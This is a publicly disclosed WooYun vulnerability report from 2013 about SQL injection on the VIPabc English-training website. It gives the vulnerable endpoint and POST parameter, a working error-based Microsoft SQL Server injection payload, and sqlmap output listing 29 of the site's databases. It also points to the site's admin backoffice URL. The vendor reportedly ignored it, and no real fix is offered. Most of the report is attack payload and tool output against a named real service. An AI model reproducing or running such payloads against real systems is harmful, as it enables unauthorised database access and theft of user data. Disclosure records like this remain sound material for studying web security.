当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-046425

漏洞标题:VIPabc英语培训主站sql注入

相关厂商:VIPabc英语培训

漏洞作者: caspar

提交时间:2013-12-19 11:54

修复时间:2014-02-02 11:54

公开时间:2014-02-02 11:54

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:10

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2013-12-19: 积极联系厂商并且等待厂商认领中,细节不对外公开
2014-02-02: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

某英语培训机构sql注入

详细说明:

http://www.vipabc.com.cn/program/search/ajax_s_query_record.asp 提交参数order=Grammar&type=&keyword=1&page=1
type是注入点

Place: POST
Parameter: type
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: order=Grammar&type=') AND 6713=CONVERT(INT,(SELECT CHAR(113)+CHAR(100)+CHAR(100)+CHAR(111)+CHAR(113)+(SELECT (CASE WHEN (6713=6713) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(97)+CHAR(99)+CHAR(116)+CHAR(113))) AND ('VVFH'='VVFH&keyword=1&page=1
---
[11:11:45] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008
web application technology: ASP.NET, Microsoft IIS 7.5, ASP
back-end DBMS: Microsoft SQL Server 2008
[11:11:45] [INFO] fetching database names
[11:11:45] [INFO] the SQL query used returns 29 entries
available databases [29]:
[*] ABCJR
[*] AgentCloud
[*] AgentCloudApplication
[*] AnibalPerfMon
[*] ASPState
[*] CashFlow
[*] DBA007_performance
[*] EATE
[*] master
[*] model
[*] msdb
[*] muchnewdb
[*] Quest_Performance_Repository
[*] recruit
[*] ReportData
[*] snapshot_muchnewdb
[*] tempdb
[*] Tesol
[*] TRACE
[*] TutorCustomerServiceOnline
[*] TutorDefinition
[*] TutorGroup.Exam.App
[*] TutorGroup.Questionnaire
[*] TutorGroup.SmsPlatform
[*] TutorGroup.TutorAbc.Exam
[*] tutormeet_fms
[*] TutorReport
[*] TutorSummary
[*] VipEATE

漏洞证明:

未深入,见详细说明,送几个小的
http://www.vipabc.com/robots.txt
后台http://www.vipabc.com/backoffice/
over

修复方案:

你们懂的

版权声明:转载请注明来源 caspar@乌云

漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝